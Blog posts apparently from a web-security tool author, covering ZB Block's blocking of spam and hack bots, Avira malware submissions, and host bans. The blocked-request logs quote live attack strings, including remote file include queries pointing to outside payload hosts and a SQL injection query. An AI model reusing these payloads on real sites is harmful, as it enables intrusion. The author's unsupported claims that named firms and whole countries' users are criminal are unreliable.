Spambot Security Blog

MaMa CaSpEr and her clan of new hack-bots... and ZB Block's Response

Well, for months, ZB Block has been concentrating on the 'QUERY_STRING' that the hostile bots were sending websites. This used to be the only way that websites were hacked, and dare I say, we were effective enough to cause the attack bot script writers to jump to a new paradigm of attacks. The new attacks, come through the 'HTTP_POST' subsystem. However like a good general, my troops had in-place a system to help combat this new vector, it just wasn't needed till now.

The new threat comes from a new family of bots. The first one of this breed of breed of bots, as far as I've been able to discern is MaMa CaSpEr, followed by Casper, Dex, Kangen, kmccrew, Sasquia, Sledink, and plaNETWORK bots, plus many others yet to be found. The one defining factor is, they attempt to execute instructions through breaking the http_post variable input system. This is done with execution wedges, either through direct "<?php (code) ?>" , bbcode "[php] (code) [/php]", or oddly enough XML "<methodCall>" execution wedging. The one defining factor is, they try to slip it in through scripts that use the once unexploited HTTP_POST vector.

Well, I guess it's now the new frontier of malicious web robot exploitation, and I hope to be here to fight it. I could remind people that sanitization of variables is the most important way to fight this plague, but no matter how hard they try to make their scripts hardened, the skiddies always find a way around it. All I can say to them is, together, we may be able to effectively fight this. You might try suggesting to your users to add ZB Block to their scripts. And to you end-users out there, your script writer tried hard to avoid these problems, together, we can be much stronger.

And to the skript kiddies, and the hackers programming the scripts that are attacking us, just remember our motto...

“Evinco, est pergo bellum!”
"To conquer, is to continue the war!"

Zap :)

China Told to Get Lost... Again.

Yep, I tried being nice, I let China/Korea have access to my site again, just incase some poor sot there was running a board, and in spam hell.

Well, lesson learned, all it did was attract low class script kiddies, skript kiddies, or skiddies, whatever you want to call them. And lo, when they saw ZB Block was impenetrable by their lame attacks, they decided to start an http_referer spam campaign against my site, usually from homosexual pornograpic sites. This is designed to hurt Google Pagerank and other indicators of a site's quality. Never once did I see a valid, interested access from China. Never once did they get through my protections.

But they annoyed the hell out of me.

It's funny how the infamous Great Firewall of China stops normal good folks from using the web, yet seems to be assisting organized crime in attacking the rest of the internet. Sounds like someone is buddy-buddy "heh-heh" getting their pockets lined by the Russian Business Network to open the floodgates of spam. Imagine that, many people going against their beloved Mao Zedong's party, and co-operating with the Russians to the detriment of his people, his party, and his state. What is worse is, the same attacks and spam were coming out of Korea too, this means that "Beloved Leader" Kim Jong-il's people are stabbing him in the back too. Just shows you how two faced communists are, no matter their stripe.

Well, lesson learned. The blocks are back in, and the ZB Block IP banlist for Chinese / Korea IPs has been updated, thanks to the lists Okean provides . Just paste them into the appropriate area of your customsig.inc to turn off China and Korea like a switch.

It's too bad I had to resort to this, but it's a lesson learned.

Zap.

ZB Block Racks Up More Bot and Script Virus Kills!

Well, Avira has gotten back to me, and it looks like I have found some viral gold they can add to their arsenal for all of us.

Here's a run-down of the fresh kills I have added to ZB Block's (custom in-house version w/ probe trap) record. Please note that ZB Block caused "natural" immunity to all attacks attempting to install these. So do the wise thing and go to http://www.spambotsecurity.com/zbblock.php and get protected.

#1

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.

Tracking number: (REMOVED).

A listing of files alongside their results can be found below:File ID Filename Size (Byte) Result

25394824 Bildb 2.03 KB MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result Bildb MALWARE

The file 'Bildb' has been determined to be 'MALWARE'. Our analysts named the threat BDS/PHP.ali.31. The term "BDS/" denotes a Backdoor-Server program. Backdoor-Server programs are used to spy out, modify or delete data.Detection is added to our virus definition file (VDF) starting with version 7.01.04.223.

#2

Thank you for your email to Avira's virus lab.

Tracking number: (REMOVED).

A listing of files alongside their results can be found below:File ID Filename Size (Byte) Result

25394829 dudul3.txt 40.88 KB MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result dudul3.txt MALWARE

The file 'dudul3.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.2. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

#3

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.

Tracking number: (REMOVED).

A listing of files alongside their results can be found below:File ID Filename Size (Byte) Result

25394826 bot_ping.txt 100.52 KB MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result bot_ping.txt MALWARE

The file 'bot_ping.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP.IrcBot.nad. Detection will be added to our virus definition file (VDF) with one of the next updates.

#4

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.

Tracking number: (REMOVED).

A listing of files alongside their results can be found below:File ID Filename Size (Byte) Result

25394836 spread.txt 19.34 KB MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result spread.txt MALWARE

The file 'spread.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/Pbot.A.6. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

#5

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.

Tracking number: (REMOVED).

We received the following archive files:

File ID Filename Size (Byte) Result

25395810 feelcomz 1.7 bot.zip 12.06 KB OK

A listing of files contained inside archives alongside their results can be found below:File ID Filename Size (Byte) Result

25395811 botphp.txt 48.89 KB MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result botphp.txt MALWARE

The file 'botphp.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/Pbot.A.7. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

#6 & 7

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.

Tracking number: (REMOVED).

We received the following archive files:

File ID Filename Size (Byte) Result

25395813 One attack from t...ts.zip 23.89 KB OK

A listing of files contained inside archives alongside their results can be found below:File ID Filename Size (Byte) Result

25395814 pbota.txt 27.42 KB MALWARE
25395815 pbotb.txt 27.39 KB MALWARE
25395816 pbotc.txt 27.72 KB MALWARE
25395817 pbotd.txt 27.73 KB MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result pbota.txt MALWARE

The file 'pbota.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.3. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Filename Result pbotb.txt MALWARE

The file 'pbotb.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Filename Result pbotc.txt MALWARE

The file 'pbotc.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Filename Result pbotd.txt MALWARE

The file 'pbotd.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Sweetness I tell you. Nothing feels better than being the shiv in the dark that takes some of this crap off the virtual streets. Real hackers don't use scripts... they may write them, but they don't use them. (Ever wonder if your pre-made script isn't designed to take away your toys eventually, eh skiddy?)

If you want to see the places these were injected, well, where they were attempted to be injected, just pour over the killed_log.txt files shared with the public on ZB Block's page.

Most will be there. Some won't.

Where are the others? Other servers!

Where are the other servers? Wouldn't you like to know!

Zap!

A little bird told me about an aviary.com full of poopy pigeons.

"But there's one thing that makes spring complete for me,
And makes ev'ry Sunday a treat for me.

All the world seems in tune
On a spring afternoon,
When we're poisoning pigeons in the park.
Ev'ry Sunday you'll see
My sweetheart and me,
As we poison the pigeons in the park." - Tom Lehrer

Okay, to start this story, I have to give proper credit to Amber MacArthur and her netcast on TWiT.tv. She's the little bird that told me about a big nasty pidgeon ready to poop on my site, and yours, just the way tynted does. No, I have not had a chance to listen to the show, but the notes gave me all the "beef" I needed.

The pidgeon's name is Aviary.com. It's another content scraper / content theif that also allows an attacker to send a malicious request to your machine, both from the previously protected against AmazonAWS cloud, and the newly killed pwebtech / FortressITX spamhost. Modus operandi? Same as tynt.com, that being content theft and acting as an un-regulated proxy for hackers.

Here is my first screenshot I wish to share with you after establishing that Aviary.com is operating out of multiple netblocks. What you see is a shot of the aviary.com site loading my site into their "screenshot". But, by the tests below, you can see it passes queries just fine, as in any exploits out there could have been done through them as an unregulated proxy server. The method used to send this query was http://aviary.com/http://www.spambotsecurity.com/?xtestx . As you can see, it bounced the AmazonAWS perfectly, and caught the trigger. Click the image for a larger (readable) one in a new window. And here is the block that it generated.

#: 6896 @: Mon, 13 Jul 2009 11:48:48 -0600
Host: ec2-174-129-94-22.compute-1.amazonaws.com
IP: 174.129.94.22
Score: 1
Why blocked: Amazon Web Services. Not an ISP. Used by hackers, Keyword spamming SEO bots, and other unsavories. Checked for bypass.
Query: xtextx
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; Data Center; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http:// www.spambotsecurity.com /?xtextx

Yet another probe of Aviary.com after addition of the new spamhost ( pwebtech/FortressITX ). Please note that now it is pulling from viary.com! Viary.com, is, like Aviary.com, hosted on the same ridin' dirty webhost. You can see, however, this time it choked. But, it still did actually hit my site. Here's the blocked request. Please note it is using random user agents to try to cloak itself. This is EXCEEDINGLY bad, and very suspicious behavior.

#: 6899 @: Mon, 13 Jul 2009 12:32:21 -0600
Host: 65.98.13.118
IP: 65.98.13.118
Score: 2
Why blocked: pwebtech/FortressITX spam-friendly host/aviary.com unregulated proxy service. Test Trigger to test function.
Query: xtestx4
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http:// www.spambotsecurity.com /?xtestx4

I also used their services, if they check their logs, to send them a "you've been bad, so here's the scoop, all you get for Christmas is snowman poop!" message. And, here's the logging of that hit. (Which actually came before the previous image, but cemented FortressITX / pwebtech's doom.)

#: 6897 @: Mon, 13 Jul 2009 11:51:10 -0600
Host: 65.98.13.118
IP: 65.98.13.118
Score: 1
Why blocked: Test Trigger to test function.
Query: xtestx=your_site_is_an_unregulated_proxy_server_used_by_hackers_and_will_be_added_to_the_signatures_of_ZB_block
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http:// www.spambotsecurity.com /?xtestx=your_site_is_an_unregulated_proxy_server_used_by_hackers_and_will_be_added_to_the_signatures_of_ZB_block

I would be remiss if I didn't mention IncrediBILL's Random Rants, his pages first turned me onto a good description of this kind of problem. (Also, previous logs were showing hacking attempts from tynt.com / tynted.net).

Zap!  

Booyeah! Nailed one to the wall! Scratch one bot variant.

I gots me a trophy!

*** BEGIN MESSAGE ***

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.

Tracking number: (REMOVED).

A listing of files alongside their results can be found below:

File ID	Filename	Size (Byte)	Result
25382358	mucil_idle.txt	39.07 KB	MALWARE

Please find a detailed report concerning each individual sample below:

The file 'mucil_idle.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.F. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Alternatively you can see the analysis result here:

http://analysis.avira.com/samples/details.php?uniqueid=(REMOVED)

An overview of all your submissions can be found here:

http://analysis.avira.com/samples/details.php?uniqueid=(REMOVED)

Please note: If you have specific questions please address them to support@avira.com

Kind regards

Avira Virus Lab

*** END OF MESSAGE ***

Interesting things happen when I modify a version of ZB Block on another site to return a false success to a scanning probe... like actually taking some scum off the streets, rather than just stopping the attack their probes were trying.

I hereby declare PHP/IrcBot.F to be my first kill, in what I hope to be a string of many! And to those who might not like this news, all I can say is, you knew it was coming.

Zap!  

P.S. I might also mention here, that those of you running ZB Block were naturally immune to this infection vector. My modification just had to do with modifying the output of ZB Block to cause the virus to think it had found an infectable machine, by returning the proper code to it.

PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.

Remember what I said about no one notices the robber casing the joint, but everyone notices when he's committing / committed the crime? Remember my go-arounds with laycat.com, kyklo.com, aceleo.com, and their more than willing to share IP space host, dedibox.fr?

Witness if you will, a vengeance script attack on a well defended website with two doors, and the results that are gleaned when a quick minded sentry is guarding one of those doors. The problem is, the other door, the one our attacker will go through, does not lead to satisfaction, but a grim reminder that they have stepped into... The Toilet Zone.

#: 6594 @: Tue, 14 Apr 2009 13:53:55 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6625 @: Tue, 14 Apr 2009 14:21:17 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Then again:

#: 6627 @: Tue, 14 Apr 2009 14:26:40 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6633 @: Tue, 14 Apr 2009 14:27:14 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Changing method to:

#: 6634 @: Tue, 14 Apr 2009 14:40:50 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6644 @: Tue, 14 Apr 2009 14:44:57 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Oh no, not again, just 2 this time...

#: 6663 @: Wed, 15 Apr 2009 00:20:15 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

and...

#: 6664 @: Wed, 15 Apr 2009 00:20:27 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

Now I know that none of these attacks came from laycat.com , aceleo.com , or kyklo.com adresses themselves. But I have shown, beyond reasonable doubt, that laycat uses other IPs in the dedibox.fr domain with great freedom and regularity. Draw your own conclusions, but I say they're RIDIN' DIRTY.

Please note that attack 3, consisting of 11 shots, occurred in 7 seconds, almost 2 slams a second... ZB Block, handled it with grace, and did as it was supposed to.

All in all, it looks like I caught me a weasel in the hen house, dedibox.fr is now attacksville forever, and I suggest that whatever method of blocking your site uses, that you ban the domain dedibox.fr until I see some good reason that their server needs to surf your site.

Blocking the *.amazonaws.com domain with ZB Block, and why.

This domain has been a continual source of content theft and hacking attempts.

Now first, I must admit that I have seen a couple good services using a *.amazonaws.com domain name, but all of the domain names are cryptic, and you just can't be sure you aren't dealing with a spoofed user client string. Now onto some finds!

Tynted
Host: ec2-67-202-60-246.compute-1.amazonaws.com
User Agent: Java/1.6.0_02

Here's the most egregious of the lot, tynt.com. This site claims straight out that it's copying the content of your site. Who da #&*%! gave them that right, especially when I claim copyright? Also, they will cause duplicate content to appear on the web, and in the eyes of google, this messes up your page rank, badly! But, that's not the worst thing...

EVEN WORSE tynt.com / tynted.net act as a no-registration-required proxy server! This allows previously blocked hackers, to come right back in and start pushing, pulling, tweaking, and investigating your site. This bad behaviour was the genesis of me blocking them. This by itself is bad, but wait, there's MORE...

REDIFF
Host: ec2-72-44-45-196.compute-1.amazonaws.com
User Agent: rdfbot/1.0 (Indian Language Web Search Engine; Rediff.com; rdfbotsupport AT rediffmailpro DOT com)

No habla hindi senõr! This is actually a content scraper, and their site seemed to be in English.

SimilarPages
Host: ec2-174-129-187-47.compute-1.amazonaws.com
User Agent: SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)

If this isn't saying "Hi, I'm an SEO scraper!" I don't know what it's saying. Buhbyenow. Usually Nutch is used by scrapers.

Conductor
Host: ec2-72-44-52-94.compute-1.amazonaws.com
User Agent: Caliperbot/1.0 (+http://www.conductor.com/caliperbot)

They say (here): "Perfect ads are only possible when the publisher retains 100% editorial control over content and advertising. It's possible with Conductor. If interested, first review our publisher requirements and then submit your site for review."

I say: "I never submitted my site for review, so why are you here? I use, and am happy with adsense."

They say (here): "So if you can compete with those other articles, other competitors, those other affiliates and aggregators that are in front of you - you can discover millions of dollars of revenue every year - without even taking into consideration brand value or the synergy that results when you appear on the first page in both paid and natural search."

I say: "So you're really keyword spamming SEO scum. Get lost. My site is high ranked for content, not stolen words."

***

I am sure there will be more as time goes on, the next version of ZB Block's signatures should have bypasses for the valid bots (currently under test), but for now, the AmazonAWS cloud is banned.

Zap.

UPDATE: The bypasses are in. Amazon AWS can be blocked from your site with impunity, without harming any valid search engines.

Stop Keyword Poaching - It's mutiny on your bounty!

You may notice that now ZB Block is blocking SEO keyword scrapers. You may ask just what they are, and why I am directing your site to block it. Well, I will do my best to fill you in on the scoop.

First off, no keyword scraping SEO robot ever drove traffic to YOUR site. Quite the opposite, they attempt to tear traffic away from your site. Worse, they try to do this by fooling the legitimate search engines, and they make money in the process. Even beyond this, some of these are known to feed the Russian Business Network (A giant cybercrime conglomerate). They RBN is interested in this so they can make bogus pages (especially security related) that have high page ranks, to attract those with legitimate interest, away to pages with bogus scam software (Like the very evil AntiVirusPro XP 2010, otherwise known as Troj/FakeXPA).

Let's use a probable hypothetical example, one that happens far too often, to describe this:

*John, an expert in the field of wonder widgets, decides to share his knowledge with the world on the best way to care for and maintain wonder widgets. He works long and hard on a site describing how to do this, and even how you can make your own wonder widget if you can't afford to buy one. His site is very informative, and well written, and the great google gods decide to give him a good page rank as an award for his hard labor.

The SEO botmasters notice his up and coming star, and decide to scrape his site for keyword content, and build a profile of his site.

Then, Gidget's Gadgets notices that their business is failing a little, and hires a SEO firm to find out why. The SEO firm compares keywords in her site, to known profiles of other sites, and finds that John's site, and wonder widgets, have a lot in common with the gadgets that Gidget sells. Not caring that they aren't the same product, and each one fills a different, but related niche, they then sell the keywords that John has, to Gidget. Gidget adds these keywords into her site, and her page rank goes up a bit on these words, and John's pagerank gets diluted.

Now John's visits drop, and people are no longer getting helped. Gidget's site gets much more traffic, but she isn't making sales, because people really want wonder widgets, and her drop is sales was due to market saturation of gadgets, not a competing site. Now no one is happy... except the SEO company that has Gidget's money.*

This sort of behavior is in the realm of keyword spamming, it helps no one. Keyword spam turns the internet into a sargassosistic morass of false leads generated by tricked search engines, that just cause more traffic overload, and more confused, and frustrated innocent victims.

Someday, search engines may find a way to stop this, but for now, and until the expiration of P.T. Barnum's Maxim "You can fool all of the people some of the time, some of the people all of the time, but not all of the people all of the time.", and until the invention of decent AI, keyword spam will be a threat. Your best defense is to send the SEO bots packing with something like ZB Block, while welcoming legitimate search bots with open arms.

~Zaphod

P.S. Thanks WY G&F for a title idea. To be honest, it fits!

Guess who?

Look who ignored robots.txt again after a couple of weeks.

#: 479 @: Mon, 30 Mar 2009 09:20:47 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/

So it's obviously not caching robots.txt, and having problems with it propogating to the scanners as they have claimed in an e-mail.

So now they are permanently §Hîtlisted as being part of the Russian Business Network. I have no doubts now... Oh wait, they might say that one was before they pulled robots.txt... but explain this one you a§§holes, over 2 hours later, and FAKING a http_referer from a protected page no less...

#: 482 @: Mon, 30 Mar 2009 11:42:48 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/zbblock.php

Oh, and btw, the same group of nogoodniks just slammed my friend's site for 100s of page pulls, in violation of robots.txt too. She's P.O.ed! Hell hath no wrath like a woman's robots.txt scorned.

Welcome to being labled as pure RBN trash in my blocklists.

EDIT: I might also mention here, that laycat, kyklo, aceleo, and dedibox are now all blocked by ZB Block which can be downloaded for free here.

Zaphod "Some Heads are Gonna Roll" Breeblebrox

Deffinate New MySQL attack through phpBB2 and possibly other CMS. ZB Block defends.

Well, just when you think life is boring, some aspiring skript kiddie tries a new attack! This one affects MySQL and was attempted against a phpBB2 board. I feel that this attack is probably damaging to any board, and perhaps even CMS systems.

This is a serious situation, and did require an update to the signatures in ZB Block. Here is what the new attack looked like...

#: 5437 @: Tue, 24 Mar 2009 21:10:16 -0600
Host: mail.tmanshost.com
IP: 207.44.178.47
Score: 2
Why blocked: MySQL attack. Mail server, usually infected. Please access from a regular domain name.
File: removed for security
Post:
Query: p=-1/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/0x30653763326137383538643038336566366365353233373433305317531753175317/*
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http://zaphodb777.dyndns.org/forum/viewtopic.php?p=-1/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/0x30653763326137383538643038336566366365353233373433305317531753175317/*

Don't worry, that version has been neutered. It appears to be a self propogating worm, with several attack sequences, most much longer, attempting multiple injections into your MySQL db. ZB Block caught it on just 1 variable, and in smarter hands, would have missed it, and I would have been exploited.

Things the new attack has in common...

1. Uses a negative page number (probably to pop execution at a specified/known/expected place in the script.)
2. Uses "/**/" for blind concatenation of strings. The older attacks used "+".
3. Has a "/*" trailing at the end of query.

ZB Block's signatures have been updated to adapt to this new threat, and updating them is critical!

Zap.